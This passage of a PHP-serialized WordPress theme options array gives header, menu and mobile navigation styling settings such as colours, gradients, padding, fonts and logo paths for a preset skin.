100%\";s:33:\"header-elements-soc_icons-bg-size\";s:4:\"26px\";s:32:\"header-elements-soc_icons-border\";s:8:\"disabled\";s:38:\"header-elements-soc_icons-border-color\";s:7:\"#ffffff\";s:31:\"header-elements-soc_icons-color\";s:7:\"#aeb1b5\";s:45:\"header-elements-soc_icons-first-header-switch\";s:13:\"top_bar_right\";s:34:\"header-elements-soc_icons-hover-bg\";s:6:\"accent\";s:40:\"header-elements-soc_icons-hover-bg-color\";s:18:\"rgba(21,191,230,1)\";s:43:\"header-elements-soc_icons-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:38:\"header-elements-soc_icons-hover-border\";s:8:\"disabled\";s:44:\"header-elements-soc_icons-hover-border-color\";s:7:\"#ffffff\";s:37:\"header-elements-soc_icons-hover-color\";s:7:\"#ffffff\";s:37:\"header-elements-soc_icons-on-desktops\";s:4:\"show\";s:46:\"header-elements-soc_icons-second-header-switch\";s:7:\"in_menu\";s:30:\"header-elements-soc_icons-size\";s:4:\"16px\";s:39:\"header-elements-soc_icons_border_radius\";s:5:\"100px\";s:38:\"header-elements-soc_icons_border_width\";s:3:\"1px\";s:29:\"header-elements-soc_icons_gap\";i:5;s:20:\"header-elements-text\";s:35:\"Some call to action text goes here!\";s:22:\"header-elements-text-2\";s:35:\"Some call to action text goes here!\";s:42:\"header-elements-text-2-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-2-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-2-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-3\";s:35:\"Some call to action text goes here!\";s:42:\"header-elements-text-3-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-3-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-3-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-4\";s:0:\"\";s:42:\"header-elements-text-4-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-4-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-4-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-5\";s:0:\"\";s:42:\"header-elements-text-5-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-5-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-5-second-header-switch\";s:7:\"in_menu\";s:40:\"header-elements-text-first-header-switch\";s:9:\"near_logo\";s:32:\"header-elements-text-on-desktops\";s:4:\"show\";s:41:\"header-elements-text-second-header-switch\";s:7:\"in_menu\";s:40:\"header-floating-mobile-first_switch-logo\";s:7:\"desktop\";s:41:\"header-floating-mobile-second_switch-logo\";s:7:\"desktop\";s:33:\"header-floating_microwidgets-font\";s:7:\"default\";s:39:\"header-floating_microwidgets-font-color\";s:7:\"#ffffff\";s:33:\"header-floating_microwidgets-icon\";s:7:\"default\";s:39:\"header-floating_microwidgets-icon-color\";s:7:\"#ffffff\";s:49:\"header-floating_navigation-active_item-font-color\";s:7:\"#ffffff\";s:52:\"header-floating_navigation-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:35:\"header-floating_navigation-bg-color\";s:19:\"rgba(255,255,255,1)\";s:35:\"header-floating_navigation-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:43:\"header-floating_navigation-bg-is_fullscreen\";b:0;s:37:\"header-floating_navigation-decoration\";s:6:\"shadow\";s:43:\"header-floating_navigation-decoration-color\";s:19:\"rgba(51,51,51,0.11)\";s:47:\"header-floating_navigation-decoration-line_size\";s:3:\"1px\";s:38:\"header-floating_navigation-font-active\";s:7:\"default\";s:37:\"header-floating_navigation-font-color\";s:7:\"#ffffff\";s:37:\"header-floating_navigation-font-hover\";s:7:\"default\";s:38:\"header-floating_navigation-font-normal\";s:7:\"default\";s:33:\"header-floating_navigation-height\";s:4:\"60px\";s:43:\"header-floating_navigation-hover-font-color\";s:7:\"#ffffff\";s:46:\"header-floating_navigation-hover-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:37:\"header-floating_navigation-show_after\";s:4:\"94px\";s:32:\"header-floating_navigation-style\";s:6:\"sticky\";s:34:\"header-floating_navigation-top-bar\";b:0;s:22:\"header-inline-elements\";a:3:{s:12:\"top_bar_left\";a:2:{i:0;s:5:\"phone\";i:1;s:13:\"working_hours\";}s:13:\"top_bar_right\";a:1:{i:0;s:12:\"social_icons\";}s:15:\"near_menu_right\";a:1:{i:0;s:6:\"search\";}}s:50:\"header-inline-elements-near_menu-custom-icon-color\";s:0:\"\";s:49:\"header-inline-elements-near_menu-custom-icon-size\";s:2:\"16\";s:43:\"header-inline-elements-near_menu-font_color\";s:7:\"#333333\";s:43:\"header-inline-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:46:\"header-inline-elements-near_menu_right-padding\";s:15:\"0px 0px 0px 5px\";s:20:\"header-inline-height\";s:4:\"90px\";s:26:\"header-inline-is_fullwidth\";s:1:\"0\";s:27:\"header-inline-menu-position\";s:6:\"center\";s:27:\"header-inline-show_elements\";s:1:\"1\";s:26:\"header-inline-side-padding\";s:9:\"50px 50px\";s:29:\"header-inline-switch_paddings\";s:5:\"778px\";s:29:\"header-inline_mobile_paddings\";s:9:\"20px 20px\";s:13:\"header-layout\";s:6:\"inline\";s:19:\"header-logo-padding\";s:15:\"0px 5px 0px 0px\";s:14:\"header-logo_hd\";a:2:{i:0;s:63:\"/inc/presets/images/full/skin11r.header-logo-hd.png?w=114&h=114\";i:1;i:0;}s:19:\"header-logo_regular\";a:2:{i:0;s:66:\"/inc/presets/images/full/skin11r.header-logo-regular.png?w=57&h=57\";i:1;i:0;}s:32:\"header-mega-menu-desc-font-color\";s:7:\"#333333\";s:32:\"header-mega-menu-desc-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"10\";}s:30:\"header-mega-menu-items-padding\";s:17:\"9px 10px 9px 10px\";s:40:\"header-mega-menu-submenu-2-level-spacing\";s:3:\"0px\";s:35:\"header-mega-menu-submenu-bg-padding\";s:19:\"20px 10px 20px 10px\";s:39:\"header-mega-menu-submenu-column-padding\";s:17:\"0px 10px 0px 10px\";s:37:\"header-mega-menu-submenu-column-width\";s:5:\"260px\";s:45:\"header-mega-menu-title-active_item-font-color\";s:7:\"#ffffff\";s:51:\"header-mega-menu-title-active_item-font-color-style\";s:8:\"gradient\";s:48:\"header-mega-menu-title-active_item-font-gradient\";s:30:\"90deg|#8224e3 30%|#eeee22 100%\";s:33:\"header-mega-menu-title-font-color\";s:7:\"#333333\";s:39:\"header-mega-menu-title-hover-font-color\";s:7:\"#ffffff\";s:45:\"header-mega-menu-title-hover-font-color-style\";s:8:\"gradient\";s:42:\"header-mega-menu-title-hover-font-gradient\";s:29:\"90deg|#1e73be 30%|#eeee22 99%\";s:32:\"header-mega-menu-title-icon-size\";s:2:\"16\";s:33:\"header-mega-menu-title-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"16\";}s:36:\"header-mega-menu-widget-accent-color\";s:0:\"\";s:34:\"header-mega-menu-widget-font-color\";s:7:\"#333333\";s:35:\"header-mega-menu-widget-title-color\";s:7:\"#333333\";s:34:\"header-menu-active_item-font-color\";s:7:\"#333333\";s:40:\"header-menu-active_item-font-color-style\";s:5:\"color\";s:37:\"header-menu-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:30:\"header-menu-close_icon-caption\";s:8:\"disabled\";s:35:\"header-menu-close_icon-caption-text\";s:10:\"Navigation\";s:41:\"header-menu-close_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"16\";}s:34:\"header-menu-close_icon-caption_gap\";s:4:\"20px\";s:31:\"header-menu-close_icon-position\";s:7:\"outside\";s:27:\"header-menu-close_icon-size\";s:11:\"fade_medium\";s:41:\"header-menu-decoration-other-active-color\";s:22:\"rgba(255,255,255,0.15)\";s:47:\"header-menu-decoration-other-active-color-style\";s:6:\"accent\";s:44:\"header-menu-decoration-other-active-gradient\";s:55:\"135deg|rgba(255,255,255,0.15) 30%|rgba(0,0,0,0.15) 100%\";s:40:\"header-menu-decoration-other-active-line\";s:1:\"0\";s:46:\"header-menu-decoration-other-active-line-color\";s:20:\"rgba(130,36,227,0.3)\";s:52:\"header-menu-decoration-other-active-line-color-style\";s:5:\"color\";s:49:\"header-menu-decoration-other-active-line-gradient\";s:56:\"135deg|rgba(221,51,51,0.3) 30%|rgba(129,215,66,0.3) 100%\";s:48:\"header-menu-decoration-other-active-line-opacity\";s:2:\"30\";s:43:\"header-menu-decoration-other-active-opacity\";s:2:\"15\";s:41:\"header-menu-decoration-other-active-style\";s:10:\"background\";s:42:\"header-menu-decoration-other-border-radius\";s:1:\"3\";s:40:\"header-menu-decoration-other-hover-color\";s:22:\"rgba(255,255,255,0.15)\";s:46:\"header-menu-decoration-other-hover-color-style\";s:6:\"accent\";s:43:\"header-menu-decoration-other-hover-gradient\";s:55:\"135deg|rgba(255,255,255,0.15) 30%|rgba(0,0,0,0.15) 100%\";s:39:\"header-menu-decoration-other-hover-line\";s:1:\"0\";s:45:\"header-menu-decoration-other-hover-line-color\";s:20:\"rgba(221,51,51,0.23)\";s:51:\"header-menu-decoration-other-hover-line-color-style\";s:8:\"gradient\";s:48:\"header-menu-decoration-other-hover-line-gradient\";s:55:\"135deg|rgba(255,255,255,0.23) 30%|rgba(0,0,0,0.23) 100%\";s:47:\"header-menu-decoration-other-hover-line-opacity\";s:2:\"23\";s:40:\"header-menu-decoration-other-hover-style\";s:10:\"background\";s:38:\"header-menu-decoration-other-line_size\";s:3:\"2px\";s:47:\"header-menu-decoration-other-links-is_justified\";s:1:\"1\";s:36:\"header-menu-decoration-other-opacity\";s:2:\"15\";s:28:\"header-menu-decoration-style\";s:9:\"underline\";s:38:\"header-menu-decoration-underline-color\";s:7:\"#1e73be\";s:44:\"header-menu-decoration-underline-color-style\";s:6:\"accent\";s:42:\"header-menu-decoration-underline-direction\";s:13:\"left_to_right\";s:41:\"header-menu-decoration-underline-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:42:\"header-menu-decoration-underline-line_size\";s:3:\"2px\";s:26:\"header-menu-dividers-color\";s:19:\"rgba(17,17,17,0.14)\";s:27:\"header-menu-dividers-height\";s:4:\"24px\";s:33:\"header-menu-dividers-height-style\";s:6:\"custom\";s:29:\"header-menu-dividers-surround\";s:1:\"0\";s:26:\"header-menu-dividers-width\";s:3:\"1px\";s:22:\"header-menu-font-color\";s:7:\"#333333\";s:28:\"header-menu-hover-font-color\";s:7:\"#333333\";s:34:\"header-menu-hover-font-color-style\";s:5:\"color\";s:31:\"header-menu-hover-font-gradient\";s:30:\"90deg|#8224e3 30%|#751257 100%\";s:21:\"header-menu-icon-size\";s:2:\"14\";s:23:\"header-menu-item-margin\";s:19:\"18px 14px 18px 14px\";s:24:\"header-menu-item-padding\";s:15:\"4px 4px 4px 4px\";s:47:\"header-menu-item-surround_margins-custom-margin\";s:4:\"30px\";s:39:\"header-menu-item-surround_margins-style\";s:8:\"disabled\";s:25:\"header-menu-show_dividers\";s:1:\"0\";s:31:\"header-menu-show_next_lvl_icons\";b:0;s:35:\"header-menu-submenu-active-bg-color\";s:21:\"rgba(137,92,184,0.07)\";s:41:\"header-menu-submenu-active-bg-color-style\";s:6:\"accent\";s:38:\"header-menu-submenu-active-bg-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:37:\"header-menu-submenu-active-bg-opacity\";s:1:\"7\";s:37:\"header-menu-submenu-active-font-color\";s:7:\"#ffffff\";s:43:\"header-menu-submenu-active-font-color-style\";s:6:\"accent\";s:40:\"header-menu-submenu-active-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:28:\"header-menu-submenu-bg-color\";s:7:\"#ffffff\";s:28:\"header-menu-submenu-bg-hover\";s:10:\"background\";s:30:\"header-menu-submenu-bg-padding\";s:17:\"9px 10px 9px 10px\";s:28:\"header-menu-submenu-bg-width\";s:5:\"280px\";s:27:\"header-menu-submenu-display\";s:5:\"hover\";s:30:\"header-menu-submenu-font-color\";s:7:\"#333333\";s:34:\"header-menu-submenu-hover-bg-color\";s:21:\"rgba(137,92,184,0.07)\";s:40:\"header-menu-submenu-hover-bg-color-style\";s:6:\"accent\";s:37:\"header-menu-submenu-hover-bg-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:36:\"header-menu-submenu-hover-bg-opacity\";s:1:\"7\";s:36:\"header-menu-submenu-hover-font-color\";s:7:\"#895cb8\";s:42:\"header-menu-submenu-hover-font-color-style\";s:6:\"accent\";s:39:\"header-menu-submenu-hover-font-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:29:\"header-menu-submenu-icon-size\";s:2:\"14\";s:31:\"header-menu-submenu-item-margin\";s:15:\"0px 0px 2px 0px\";s:32:\"header-menu-submenu-item-padding\";s:19:\"10px 10px 10px 10px\";s:39:\"header-menu-submenu-parent_is_clickable\";s:1:\"1\";s:39:\"header-menu-submenu-show_next_lvl_icons\";s:1:\"1\";s:39:\"header-menu-submenu-subtitle-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"10\";}s:30:\"header-menu-submenu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:500\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:31:\"header-menu-subtitle-typography\";a:2:{s:11:\"font_family\";s:15:\"Arial:400italic\";s:9:\"font_size\";s:2:\"11\";}s:22:\"header-menu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:25:\"header-menu_close_icon-bg\";s:7:\"enabled\";s:39:\"header-menu_close_icon-bg-border-radius\";s:3:\"0px\";s:38:\"header-menu_close_icon-bg-border-width\";s:3:\"0px\";s:31:\"header-menu_close_icon-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:31:\"header-menu_close_icon-bg-hover\";s:7:\"enabled\";s:29:\"header-menu_close_icon-border\";s:7:\"enabled\";s:35:\"header-menu_close_icon-border-color\";s:0:\"\";s:41:\"header-menu_close_icon-border-color-hover\";s:0:\"\";s:35:\"header-menu_close_icon-border-hover\";s:7:\"enabled\";s:36:\"header-menu_close_icon-caption_color\";s:7:\"#000000\";s:42:\"header-menu_close_icon-caption_color-hover\";s:7:\"#000000\";s:28:\"header-menu_close_icon-color\";s:7:\"#000000\";s:34:\"header-menu_close_icon-hover-color\";s:7:\"#000000\";s:29:\"header-menu_close_icon-margin\";s:19:\"30px 30px 30px 30px\";s:30:\"header-menu_close_icon-padding\";s:19:\"15px 15px 15px 15px\";s:19:\"header-menu_icon-bg\";s:7:\"enabled\";s:33:\"header-menu_icon-bg-border-radius\";s:3:\"0px\";s:32:\"header-menu_icon-bg-border-width\";s:3:\"0px\";s:25:\"header-menu_icon-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:31:\"header-menu_icon-bg-color-hover\";s:22:\"rgba(255,255,255,0.75)\";s:25:\"header-menu_icon-bg-hover\";s:7:\"enabled\";s:23:\"header-menu_icon-border\";s:7:\"enabled\";s:29:\"header-menu_icon-border-color\";s:0:\"\";s:29:\"header-menu_icon-border-hover\";s:7:\"enabled\";s:35:\"header-menu_icon-border-hover-color\";s:0:\"\";s:24:\"header-menu_icon-caption\";s:8:\"disabled\";s:32:\"header-menu_icon-caption-padding\";s:19:\"18px 15px 18px 15px\";s:29:\"header-menu_icon-caption-text\";s:4:\"Menu\";s:35:\"header-menu_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:30:\"header-menu_icon-caption_color\";s:7:\"#000000\";s:36:\"header-menu_icon-caption_color-hover\";s:7:\"#000000\";s:28:\"header-menu_icon-caption_gap\";s:4:\"10px\";s:22:\"header-menu_icon-color\";s:7:\"#000000\";s:28:\"header-menu_icon-color-hover\";s:7:\"#000000\";s:25:\"header-menu_icon-elements\";a:0:{}s:44:\"header-menu_icon-elements-below_menu-padding\";s:15:\"0px 0px 0px 0px\";s:53:\"header-menu_icon-elements-near_menu-custom-icon-color\";s:0:\"\";s:52:\"header-menu_icon-elements-near_menu-custom-icon-size\";s:2:\"16\";s:46:\"header-menu_icon-elements-near_menu-font_color\";s:7:\"#888888\";s:46:\"header-menu_icon-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:31:\"header-menu_icon-hover-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:23:\"header-menu_icon-margin\";s:15:\"0px 0px 0px 0px\";s:30:\"header-menu_icon-show_elements\";s:1:\"0\";s:21:\"header-menu_icon-size\";s:6:\"medium\";s:21:\"header-mixed-bg-color\";s:19:\"rgba(255,255,255,1)\";s:23:\"header-mixed-decoration\";s:6:\"shadow\";s:29:\"header-mixed-decoration-color\";s:18:\"rgba(221,153,51,1)\";s:28:\"header-mixed-decoration_size\";s:3:\"1px\";s:29:\"header-mixed-floating-top-bar\";b:0;s:28:\"header-mixed-sticky-bg-color\";s:7:\"#000000\";s:29:\"header-mobile-content-padding\";s:19:\"45px 15px 30px 30px\";s:24:\"header-mobile-decoration\";s:6:\"shadow\";s:30:\"header-mobile-decoration-color\";s:7:\"#ffffff\";s:34:\"header-mobile-decoration-line_size\";s:3:\"1px\";s:32:\"header-mobile-first_switch-after\";s:5:\"992px\";s:33:\"header-mobile-first_switch-height\";s:4:\"60px\";s:33:\"header-mobile-first_switch-layout\";s:10:\"right_left\";s:31:\"header-mobile-first_switch-logo\";s:6:\"mobile\";s:39:\"header-mobile-first_switch-side-padding\";s:9:\"50px 50px\";s:31:\"header-mobile-floating-bg-color\";s:4:\"#fff\";s:33:\"header-mobile-floating_navigation\";s:6:\"sticky\";s:29:\"header-mobile-header-bg-color\";s:19:\"rgba(255,255,255,1)\";s:24:\"header-mobile-menu-align\";s:5:\"right\";s:27:\"header-mobile-menu-bg-color\";s:19:\"rgba(255,255,255,1)\";s:27:\"header-mobile-menu-bg-width\";s:5:\"330px\";s:37:\"header-mobile-menu-close_icon-caption\";s:8:\"disabled\";s:42:\"header-mobile-menu-close_icon-caption-text\";s:4:\"Menu\";s:48:\"header-mobile-menu-close_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:41:\"header-mobile-menu-close_icon-caption_gap\";s:4:\"10px\";s:38:\"header-mobile-menu-close_icon-position\";s:5:\"right\";s:34:\"header-mobile-menu-close_icon-size\";s:11:\"fade_medium\";s:33:\"header-mobile-menu-dividers-color\";s:19:\"rgba(51,51,51,0.12)\";s:34:\"header-mobile-menu-dividers-height\";s:3:\"1px\";s:29:\"header-mobile-menu-font-color\";s:7:\"#333333\";s:35:\"header-mobile-menu-font-hover-color\";s:7:\"#3c3e45\";s:41:\"header-mobile-menu-font-hover-color-style\";s:6:\"accent\";s:38:\"header-mobile-menu-font-hover-gradient\";s:30:\"90deg|#b78ce2 30%|#1e73be 100%\";s:32:\"header-mobile-menu-show_dividers\";s:1:\"1\";s:29:\"header-mobile-menu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:38:\"header-mobile-menu_close-caption_color\";s:4:\"#fff\";s:44:\"header-mobile-menu_close-caption_color-hover\";s:4:\"#fff\";s:32:\"header-mobile-menu_close_icon-bg\";s:7:\"enabled\";s:46:\"header-mobile-menu_close_icon-bg-border-radius\";s:3:\"0px\";s:45:\"header-mobile-menu_close_icon-bg-border-width\";s:3:\"0px\";s:38:\"header-mobile-menu_close_icon-bg-color\";s:0:\"\";s:38:\"header-mobile-menu_close_icon-bg-hover\";s:7:\"enabled\";s:36:\"header-mobile-menu_close_icon-border\";s:8:\"disabled\";s:42:\"header-mobile-menu_close_icon-border-color\";s:0:\"\";s:48:\"header-mobile-menu_close_icon-border-color-hover\";s:0:\"\";s:42:\"header-mobile-menu_close_icon-border-hover\";s:8:\"disabled\";s:35:\"header-mobile-menu_close_icon-color\";s:4:\"#fff\";s:41:\"header-mobile-menu_close_icon-hover-color\";s:4:\"#fff\";s:36:\"header-mobile-menu_close_icon-margin\";s:16:\"15px 0px 0px 0px\";s:37:\"header-mobile-menu_close_icon-padding\";s:15:\"5px 5px 5px 5px\";s:40:\"header-mobile-menu_icon-bg-border-radius\";s:3:\"0px\";s:39:\"header-mobile-menu_icon-bg-border-width\";s:3:\"0px\";s:32:\"header-mobile-menu_icon-bg-color\";s:19:\"rgba(255,255,255,0)\";s:38:\"header-mobile-menu_icon-bg-color-hover\";s:19:\"rgba(255,255,255,0)\";s:33:\"header-mobile-menu_icon-bg-enable\";s:1:\"0\";s:32:\"header-mobile-menu_icon-bg-hover\";s:1:\"0\";s:30:\"header-mobile-menu_icon-border\";s:8:\"disabled\";s:36:\"header-mobile-menu_icon-border-color\";s:0:\"\";s:36:\"header-mobile-menu_icon-border-hover\";s:8:\"disabled\";s:42:\"header-mobile-menu_icon-border-hover-color\";s:0:\"\";s:31:\"header-mobile-menu_icon-caption\";s:8:\"disabled\";s:39:\"header-mobile-menu_icon-caption-padding\";s:17:\"12px 9px 12px 9px\";s:36:\"header-mobile-menu_icon-caption-text\";s:4:\"Menu\";s:42:\"header-mobile-menu_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:37:\"header-mobile-menu_icon-caption_color\";s:7:\"#333333\";s:43:\"header-mobile-menu_icon-caption_color-hover\";s:7:\"#333333\";s:35:\"header-mobile-menu_icon-caption_gap\";s:4:\"10px\";s:29:\"header-mobile-menu_icon-color\";s:7:\"#333333\";s:35:\"header-mobile-menu_icon-color-hover\";s:7:\"#333333\";s:38:\"header-mobile-menu_icon-hover-bg-color\";s:0:\"\";s:30:\"header-mobile-menu_icon-margin\";s:15:\"0px 0px 0px 0px\";s:28:\"header-mobile-menu_icon-size\";s:5:\"small\";s:44:\"header-mobile-microwidgets-custom-icon-color\";s:0:\"\";s:43:\"header-mobile-microwidgets-custom-icon-size\";s:2:\"16\";s:37:\"header-mobile-microwidgets-font-color\";s:7:\"#333333\";s:37:\"header-mobile-microwidgets-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-mobile-overlay-bg-color\";s:18:\"rgba(17,17,17,0.5)\";s:33:\"header-mobile-second_switch-after\";s:5:\"778px\";s:34:\"header-mobile-second_switch-height\";s:4:\"60px\";s:34:\"header-mobile-second_switch-layout\";s:10:\"right_left\";s:32:\"header-mobile-second_switch-logo\";s:6:\"mobile\";s:40:\"header-mobile-second_switch-side-padding\";s:9:\"20px 20px\";s:32:\"header-mobile-submenu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:500\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-overlay-content-padding\";s:15:\"0px 0px 0px 0px\";s:31:\"header-overlay-content-position\";s:6:\"center\";s:28:\"header-overlay-content-width\";s:5:\"300px\";s:28:\"header-overlay-logo-position\";s:12:\"fully_inside\";s:35:\"header-overlay-menu-items_alignment\";s:6:\"center\";s:30:\"header-overlay-menu-items_link\";s:9:\"fullwidth\";s:28:\"header-overlay-menu-position\";s:8:\"v_center\";s:31:\"header-show_floating_navigation\";s:1:\"1\";s:27:\"header-side-content-padding\";s:17:\"50px 0px 40px 0px\";s:20:\"header-side-elements\";a:1:{s:10:\"below_menu\";a:3:{i:0;s:12:\"social_icons\";i:1;s:5:\"email\";i:2;s:5:\"phone\";}}s:39:\"header-side-elements-below_menu-padding\";s:17:\"0px 35px 0px 35px\";s:48:\"header-side-elements-near_menu-custom-icon-color\";s:0:\"\";s:47:\"header-side-elements-near_menu-custom-icon-size\";s:2:\"16\";s:41:\"header-side-elements-near_menu-font_color\";s:7:\"#888888\";s:41:\"header-side-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:25:\"header-side-logo-position\";s:6:\"inside\";s:32:\"header-side-menu-items_alignment\";s:6:\"center\";s:27:\"header-side-menu-items_link\";s:9:\"fullwidth\";s:25:\"header-side-menu-position\";s:5:\"v_top\";s:33:\"header-side-menu-submenu-position\";s:4:\"down\";s:20:\"header-side-position\";s:5:\"right\";s:25:\"header-side-show_elements\";s:1:\"1\";s:17:\"header-side-width\";s:5:\"300px\";s:25:\"header-side_line-elements\";a:0:{}s:44:\"header-side_line-elements-below_menu-padding\";s:15:\"0px 0px 0px 0px\";s:53:\"header-side_line-elements-near_menu-custom-icon-color\";s:0:\"\";s:52:\"header-side_line-elements-near_menu-custom-icon-size\";s:2:\"16\";s:46:\"header-side_line-elements-near_menu-font_color\";s:7:\"#888888\";s:46:\"header-side_line-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:30:\"header-side_line-show_elements\";s:1:\"0\";s:22:\"header-side_line-width\";s:4:\"60px\";s:32:\"header-slide_out-content-padding\";s:17:\"50px 0px 50px 0px\";s:30:\"header-slide_out-logo-position\";s:12:\"fully_inside\";s:37:\"header-slide_out-menu-items_alignment\";s:6:\"center\";s:32:\"header-slide_out-menu-items_link\";s:9:\"fullwidth\";s:30:\"header-slide_out-menu-position\";s:5:\"v_top\";s:34:\"header-slide_out-overlay-animation\";s:4:\"fade\";s:33:\"header-slide_out-overlay-bg-color\";s:18:\"rgba(17,17,17,0.4)\";s:39:\"header-slide_out-overlay-bg-color-style\";s:5:\"color\";s:36:\"header-slide_out-overlay-bg-gradient\";s:58:\"135deg|rgba(205,183,226,0.4) 30%|rgba(130,20,130,0.4) 100%\";s:35:\"header-slide_out-overlay-bg-opacity\";s:2:\"40\";s:25:\"header-slide_out-position\";s:4:\"left\";s:22:\"header-slide_out-width\";s:5:\"400px\";s:21:\"header-split-elements\";a:1:{s:14:\"near_menu_left\";a:1:{i:0;s:6:\"search\";}}s:49:\"header-split-elements-near_menu-custom-icon-color\";s:0:\"\";s:48:\"header-split-elements-near_menu-custom-icon-size\";s:2:\"16\";s:42:\"header-split-elements-near_menu-font_color\";s:7:\"#888888\";s:42:\"header-split-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:44:\"header-split-elements-near_menu_left-padding\";s:17:\"0px 20px 0px 20px\";s:45:\"header-split-elements-near_menu_right-padding\";s:17:\"0px 20px 0px 20px\";s:19:\"header-split-height\";s:5:\"100px\";s:25:\"header-split-is_fullwidth\";s:1:\"0\";s:26:\"header-split-menu-position\";s:7:\"outside\";s:26:\"header-split-show_elements\";s:1:\"1\";s:25:\"header-split-side-padding\";s:9:\"30px 30px\";s:28:\"header-split-switch_paddings\";s:3:\"0px\";s:28:\"header-split_mobile_paddings\";s:7:\"0px 0px\";s:33:\"header-style-floating-choose_logo\";s:6:\"custom\";s:34:\"header-style-floating-logo-padding\";s:16:\"0px 18px 0px 0px\";s:29:\"header-style-floating-logo_hd\";a:2:{i:0;s:76:\"/inc/presets/images/full/skin11r.header-style-floating-logo-hd.png?w=88&h=88\";i:1;i:0;}s:34:\"header-style-floating-logo_regular\";a:2:{i:0;s:81:\"/inc/presets/images/full/skin11r.header-style-floating-logo-regular.png?w=44&h=44\";i:1;i:0;}s:41:\"header-style-floating-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:36:\"header-style-floating-mobile-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:41:\"header-style-floating-mobile-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:31:\"header-style-mixed-logo-padding\";s:15:\"0px 0px 0px 0px\";s:26:\"header-style-mixed-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:31:\"header-style-mixed-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:48:\"header-style-mixed-top_line-floating-choose_logo\";s:4:\"main\";s:49:\"header-style-mixed-top_line-floating-logo-padding\";s:15:\"0px 0px 0px 0px\";s:44:\"header-style-mixed-top_line-floating-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:49:\"header-style-mixed-top_line-floating-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:51:\"header-style-mixed-transparent-top_line-choose_logo\";s:4:\"main\";s:52:\"header-style-mixed-transparent-top_line-logo-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-style-mixed-transparent-top_line-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:52:\"header-style-mixed-transparent-top_line-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:32:\"header-style-mobile-logo-padding\";s:15:\"0px 0px 0px 